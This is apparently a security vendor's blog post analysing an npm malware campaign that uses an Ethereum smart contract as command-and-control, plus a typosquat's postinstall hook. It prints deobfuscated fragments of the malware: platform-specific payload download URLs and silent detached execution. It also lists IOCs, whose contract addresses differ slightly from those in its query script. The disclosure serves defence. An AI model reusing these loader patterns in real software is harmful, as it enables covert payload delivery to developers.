Supply chain attacks are evolving. The Socket research team has uncovered a massive malware campaign that uses Ethereum smart contracts to control its operations — making it nearly impossible to shut down through traditional means. Instead of using conventional command and control servers that can be blocked or taken offline, these attackers are leveraging blockchain's decentralized architecture to maintain persistent control over their malware.
This technique represents a significant evolution in supply chain attacks targeting the npm ecosystem. In 2023, similar supply chain attacks impacted over 1.6 million downloads, and this new blockchain-based approach demonstrates how attackers continue to innovate their methodologies to evade detection and maintain persistence.
Technical Analysis#
Discovery and Initial Assessment
Our investigation began last week with the discovery of a suspicious package named "haski" (version 2.8.5) - a typosquat targeting husky, the popular git hooks library. This malicious package attempted to exploit husky's reputation by mimicking its name while containing obfuscated malicious code linked to an Ethereum wallet address.
The malicious code was designed to execute automatically upon installation through a postinstall script defined in the package's package.json
file. The postinstall
script is a lifecycle hook in npm that runs automatically after the package is installed. By leveraging this, the attackers ensure that their malicious code is executed without any additional action from the user.
This initial finding proved to be the tip of the iceberg.
Over the last twenty-four hours, our AI scanner detected a sudden wave of malware packages flooding the npm ecosystem, all exhibiting the same execution flow and identical blockchain-based characteristics. This onslaught suggests a carefully plotted attack, with the initial "haski" package potentially serving as a test run.
Further investigation revealed dozens of packages, all following a consistent pattern:
- Legitimate-looking package names and descriptions
- Similar obfuscation patterns using the
_0x
prefix - Identical code structure once deobfuscated
- Common Ethereum contract interactions using the same wallet address found in the initial "haski" typosquat
Upon deobfuscation, we confirmed these packages were part of a coordinated campaign, each containing a sophisticated multi-stage malware downloader using Ethereum smart contracts for C2 communication. The attack infrastructure was consistent across all packages, using the same Ethereum contract address and wallet for C2 communication.
Each of the more than one hundred malware packages was published by a distinct, fake maintainer likely auto-generated through a tool like Faker. These profiles use randomized usernames and plausible email addresses with common names and random digits, such as upj4cimrds1fo
with email address KarenCampbelljzm2902@gmail.com
.
Some notable patterns across the discovered packages include:
- Similar publication timestamps after the initial "haski" deployment, suggesting automated campaign expansion
- Consistent code obfuscation techniques
- Identical blockchain-based C2 mechanism
- Uniform cross-platform payload delivery methods
This evolution from a targeted typosquat of a popular package to a broader automated campaign demonstrates the threat actors' shift toward more sophisticated and scalable attack methodologies.
Attack Architecture
The malware operates in three distinct stages:
Blockchain-Based C2 Retrieval
const contractAddress = '0xa1b40044EBc2794f207D45143Bd82a1B86156c6b';
const WalletOwner = '0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84';
const abi = ['function getString(address account) public view returns (string)'];
The malware queries a specific Ethereum contract to retrieve the payload URL, making traditional C2 blocking ineffective.
Through dynamic analysis of the contract interactions, we developed a script to query the malicious smart contract directly:
const { ethers } = require("ethers");
const provider = ethers.getDefaultProvider("mainnet");
const abi = ["function getString(address account) public view returns (string)"];
const contract = new ethers.Contract("0xa1b40044eBc2794f2707d45143Bd82a1B86156c6b", abi, provider);
async function getUrl() {
try {
const address = ethers.utils.getAddress("0x522212c293a21DBCA7AFD01aC6bFAC7175D590A84");
const baseUrl = await contract.getString(address);
console.log("Base URL:", baseUrl);
} catch (error) {
console.error("Error:", error);
}
}
getUrl();
The contract query returned a C2 server address operating at http://45[.]125[.]67[.]172:1337
. The use of a non-standard port (1337), combined with blockchain-based command retrieval, indicates a deliberate effort to evade standard detection mechanisms and to create a resilient and hard-to-disrupt C2 infrastructure:
Key findings from the C2 analysis:
- Direct IP address usage instead of domain names
- Non-standard port implementation
- Contract-based address retrieval
Cross-Platform Payload Distribution
const getDownloadUrl = (baseUrl) => {
const platform = os.platform();
switch (platform) {
case 'win32':
return baseUrl + '/node-win.exe';
case 'linux':
return baseUrl + '/node-linux';
case 'darwin':
return baseUrl + '/node-macos';
}
};
The code demonstrates a targeted platform detection and targeted payload delivery for Windows, Linux, and MacOS systems.
Stealthy Execution
const executeFileInBackground = async (filepath) => {
const process = spawn(filepath, [], {
detached: true,
stdio: 'ignore'
});
process.unref();
};
The malware executes the downloaded payload with multiple stealth mechanisms:
- Uses system temp directory for payload storage
- Spawns detached processes
- Implements error handling for persistence
- Operates silently without user interaction
Crypto Address Workflow
The funding address 0x4E5B2e1dc63F6b91cb6Cd759936495434C7e972F
appears to have a history of involvement in several crypto scams and controversial campaigns, including an incident where approximately $26 million was reportedly drained from BTC and ETH wallets and a portion deposited into this address.
The flow begins with the address (0x4E5B2...), which enables anonymous transactions, passing funds to an intermediary address (0x46b0f9bA...) for further separation. The funds then reach the primary wallet (0x52221c2...), the main operational hub that frequently interacts with a suspicious contract (0xa1b400...), using the Set String
method to store or update data. This contract likely acts as a C2 node, allowing the attacker to maintain control over malware deployments securely and persistently through the blockchain. The transaction chain is carefully structured with low-value transactions to avoid detection, demonstrating a novel use of blockchain technology for decentralized and resilient C2 infrastructure.
Russian Language Used in the Malicious Code
During the analysis, the Socket Threat Research Team identified multiple instances of Russian language usage within the malicious packages codebase. The code contains error messages written in Russian, which are used in exception handling and logging.
console.error('Ошибка установки:', error);
Translation: “Installation error:”. This string is logged when an error occurs during the installation or execution of the downloaded file.
console.error('Ошибка при получении IP адреса:', error);
Translation: “Error retrieving IP address:”. This string is logged when there is an error while fetching data from the Ethereum smart contract.
The inclusion of Russian language elements in the malicious code suggests the attacker might be proficient in Russian, but this should be interpreted cautiously due to the possibility of deliberate misattribution or code reuse. Language usage is just one factor among many, and further analysis is necessary to conclusively determine the attacker's identity and origin.
Impact and Implications
This attack vector is particularly concerning for several reasons:
- Resilient C2: Traditional domain blocking is ineffective against blockchain-based communication
- Cross-Platform: Targets all major operating systems
- Stealth: Intentional obfuscation and execution techniques
- Persistence: Error handling ensures payload delivery by persistently retrying data from the blockchain
Protect your Supply Chain with Socket#
The discovery of this blockchain-based malware campaign demonstrates the evolving sophistication of supply chain attacks in the npm ecosystem. Threat actors are now leveraging smart contracts for command and control, making traditional security measures ineffective. This campaign, spanning multiple packages like "ethsg-util", "web3-toekn", and "ethblk-tracker", showcases how attackers can distribute advanced malware through seemingly legitimate packages.
Traditional code review and manual security checks are insufficient against these modern threats. The malware's use of blockchain for C2, intentional obfuscation, and cross-platform payload delivery demands a more robust, automated approach to package security. Socket's free GitHub app provides this crucial layer of protection by:
- Identifying obfuscated malicious code patterns
- Scanning install scripts for dangerous system operations
- Alerting developers instantly via GitHub comments before malicious code enters your supply chain
- Unauthorized network connections
- Cross-platform payload downloads
- System-level operations
Install Socket's free GitHub app today and get immediate protection against advanced supply chain attacks.
Conclusion#
This discovery marks a significant evolution in supply chain attacks, demonstrating how attackers are leveraging blockchain technology to create more resilient malware infrastructure. The combination of blockchain-based C2, cross-platform targeting, and stealth mechanisms makes this a threat that requires enhanced security measures.
To protect your organization from similar threats, consider implementing automated dependency scanning with Socket's GitHub integration. Our tools can help identify suspicious packages before they enter your supply chain, providing early warning against emerging threats like this blockchain-based attack vector.
IOCs (Indicators of Compromise)
- Ethereum Contract:
0xa1b40044EBc2794f207D45143Bd82a1B86156c6b
- Wallet Address:
0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84
- File Patterns:
- Windows:
node-win.exe
- Linux:
node-linux
- MacOS:
node-macos
- Email:
- KarenCampbelljzm2902@gmail[.]com (one of over a hundred fake email addresses)
- IP Address:
- Malicious packages: